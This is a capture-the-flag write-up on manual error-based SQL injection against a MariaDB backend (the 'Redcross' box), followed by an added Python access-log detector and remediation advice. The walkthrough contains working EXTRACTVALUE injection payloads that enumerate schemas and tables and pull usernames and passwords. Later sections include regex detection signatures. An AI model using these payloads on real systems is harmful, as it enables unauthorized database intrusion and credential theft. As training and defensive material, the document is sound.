Manual Error Based SQL Injection

Credit to the wonderful box “Redcross” on HTB, which introduced me to this form of attack, so let’s start. We could always use an automated tool like sqlmap, but that is not ideal in every environment: the volume of requests can trip brute-force checks on the target, and moreover, doing it manually gives a better idea of what is actually happening and a better learning opportunity.

Suppose you are on a web page and have managed to break the backend SQL query. The error displayed on the page looks like this:
DEBUG INFO: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '5' or dest like '1'') LIMIT 10' at line 1

Let’s try to extract the DB version. We can close the original query’s quote and parenthesis and then call EXTRACTVALUE() to achieve that. We send the initial request to Burp Suite and then tweak the o parameter like this.

We sent: o=1')+and+extractvalue(0x0a,version())--+-
We got the response: DEBUG INFO: XPATH syntax error: '.26-MariaDB-0+deb9u1'
There you go, we have the database version now, but the response appears to be truncated, so let’s try something different.

Let’s wrap the version with concat and a leading 0x0a (newline) byte like this: o=1')+and+extractvalue(0x0a,concat(0x0a,version()))--+-
The response now looks much better: DEBUG INFO: XPATH syntax error:'10.1.26-MariaDB-0+deb9u1'
The newline makes the XPath parser fail on the very first character of the string, so the error message reports the value from its beginning rather than from wherever the parser happened to give up.
[Burp Suite screenshot of the request and response]

Great! Let’s dig deeper now: enter INFORMATION_SCHEMA. Read more at https://dev.mysql.com/doc/refman/8.0/en/information-schema.html
We will first use the SCHEMA_NAME column of the SCHEMATA table to list the databases. Since the error only reports a single value, we use LIMIT <n>,1 to step through the rows one at a time and find out how many databases there are. In this example LIMIT 0,1 gives the information_schema database and LIMIT 1,1 reveals the redcross database.
Request sent: o=1')+and+extractvalue(0x0a,concat(0x0a,(select+SCHEMA_NAME+from+INFORMATION_SCHEMA.SCHEMATA+LIMIT+1,1)))--+-
Response received: DEBUG INFO: XPATH syntax error: '
redcross'

Now let’s look at the tables in the redcross database. We use the TABLES table, filtered on TABLE_SCHEMA, and step through the rows with the same LIMIT logic. For example, we were able to discover a users table with the following.
Request sent: o=1')+and+extractvalue(0x0a,concat(0x0a,(select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+where+TABLE_SCHEMA+like+'redcross'+LIMIT+2,1)))--+-
Response received: DEBUG INFO: XPATH syntax error: 'users'

Awesome! Now let’s look at the columns of the users table. We follow the same logic against the COLUMNS table.
Request sent: o=1')+and+extractvalue(0x0a,concat(0x0a,(select+COLUMN_NAME+from+INFORMATION_SCHEMA.COLUMNS+where+TABLE_NAME+like+'users'+LIMIT+0,1)))--+-
Response received: DEBUG INFO: XPATH syntax error: 'id'
In our example:

LIMIT 1,1 gives username
LIMIT 2,1 gives password
LIMIT 3,1 gives email
LIMIT 4,1 gives role
Now, you guessed it, we want to see the actual data: the actual usernames and passwords!

Request sent: o=1')+and+extractvalue(0x0a,concat(0x0a,(select+username+from+redcross.users+LIMIT+0,1)))--+-
Response received: DEBUG INFO: XPATH syntax error: 'admin'
Increment the LIMIT offset to go through all the users, then repeat the same steps for the password column. You now have the user:password combinations. Happy pen-testing!
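From the defender’s side, the requests above have a very recognisable shape in the web server’s access log. The following Python script is an added example, not part of the original write-up: it URL-decodes each request’s query string, matches it against signatures for the technique (XML error function, INFORMATION_SCHEMA, the quote/parenthesis breakout and the "-- -" terminator) and flags requests that hit several at once. The log lines are constructed, with 198.51.100.2 and 203.0.113.7 as made-up client addresses.

```python
import re
from urllib.parse import unquote_plus, urlparse

# Signatures for the error-based technique walked through above: the XML error
# functions carrying a subquery, the INFORMATION_SCHEMA catalog, the quote and
# parenthesis breakout, and the "-- -" terminator that comments out the rest
# of the original query.
SIGNATURES = {
    "xml-error-function": re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),
    "information-schema": re.compile(r"\binformation_schema\b", re.I),
    "comment-terminator": re.compile(r"--\s"),
    "quote-breakout": re.compile(r"""['"]\s*\)\s*(and|or)\b""", re.I),
}

# Common Log Format; the request path is the only field inspected.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

def score_request(query_string):
    """Return the names of the signatures matching the URL-decoded query string."""
    decoded = unquote_plus(query_string)  # '+' becomes a space, %xx is decoded
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_access_log(lines, min_hits=2):
    """Return (ip, path, hits) for each request matching at least min_hits signatures.
    Requiring two keeps a lone word like 'information_schema' typed into an
    ordinary search box from raising an alert on its own."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not in Common Log Format, skip it
        hits = score_request(urlparse(m.group("path")).query)
        if len(hits) >= min_hits:
            findings.append((m.group("ip"), m.group("path"), hits))
    return findings

# Constructed sample log: two ordinary searches, then the two requests from the
# walkthrough above (the 500s are where the DEBUG INFO page came back).
SAMPLE_LOG = [
    '198.51.100.2 - - [10/Oct/2023:12:00:01 +0000] "GET /?o=cats+and+dogs HTTP/1.1" 200 512',
    '198.51.100.2 - - [10/Oct/2023:12:00:05 +0000] "GET /?o=information_schema HTTP/1.1" 200 498',
    """203.0.113.7 - - [10/Oct/2023:12:01:10 +0000] "GET /?o=1')+and+extractvalue(0x0a,version())--+- HTTP/1.1" 500 211""",
    """203.0.113.7 - - [10/Oct/2023:12:01:42 +0000] "GET /?o=1')+and+extractvalue(0x0a,concat(0x0a,(select+SCHEMA_NAME+from+INFORMATION_SCHEMA.SCHEMATA+LIMIT+1,1)))--+- HTTP/1.1" 500 215""",
]

if __name__ == "__main__":
    for ip, path, hits in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {path}\n    matched: {', '.join(hits)}")
```

Detection is the second line of defence; the root cause is that the o parameter is concatenated into the query and the database error is echoed back as DEBUG INFO, which parameterized queries and a generic error page remove respectively.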
